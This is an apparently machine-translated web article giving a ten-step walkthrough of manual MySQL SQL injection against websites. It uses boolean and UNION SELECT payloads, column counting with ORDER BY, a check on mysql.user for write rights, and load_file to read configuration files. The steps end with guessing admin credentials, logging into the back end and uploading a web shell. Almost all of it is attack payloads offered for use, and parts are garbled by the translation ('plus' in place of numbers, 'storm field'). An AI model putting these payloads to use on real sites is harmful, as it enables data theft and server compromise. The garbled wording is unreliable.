1. Determine if there is injection, plus, and 1=1;and 1=2
2. Determine version and Ord (Mid (Version (), plus)) >51/* Return normal description is 4.0 or higher, you can use union query
3. Use ORDER by storm field, add order by 10/* After URL if return normal description field greater than 10
4. Use union again to query the exact field, such as: and 1=2 Union select,......./* until returned to normal, indicating the number of exact fields guessed. If you filter the space can be replaced with/**/.
5. Determine if the database connection account has write permissions, and (select COUNT (*) from Mysql.user) >0/* If the result returns an error, then we can only guess the administrator account and password.
6. If you return to normal, you can 1=2 Union select 1,2,3,4,5,6,load_file (char (ASCII value of the file path, separated by commas), 8,9,10/* Note: load_file
(char (the ASCII value of the file path, separated by commas) can also be used in hexadecimal to read the configuration file, locate the database connection, and so on.
7. First guess the user table, such as: and 1=2 Union select 1,2,3,4,5,6 .... From user/* If it returns to normal, the table exists.
8. Know the table on the Guess field, and 1=2 Union select 1,username,3,4,5,6 .... From user/* If the field content is displayed in the 2 field, there are some fields.
9. Again guess the password field, guess the solution successfully and then find the background login.
10. Login to the background, upload shell
http://www.bkjia.com/PHPjc/486055.html www.bkjia.com true http://www.bkjia.com/PHPjc/486055.html techarticle 1. Determine if there is injection, plus, and 1=1;and 1=2 2. Determine the version and Ord (Mid (Version (), 1, 1)) 51/* Returns the normal description is more than 4.0, you can use Union to query 3. Use the Order by storm field, ... /c5>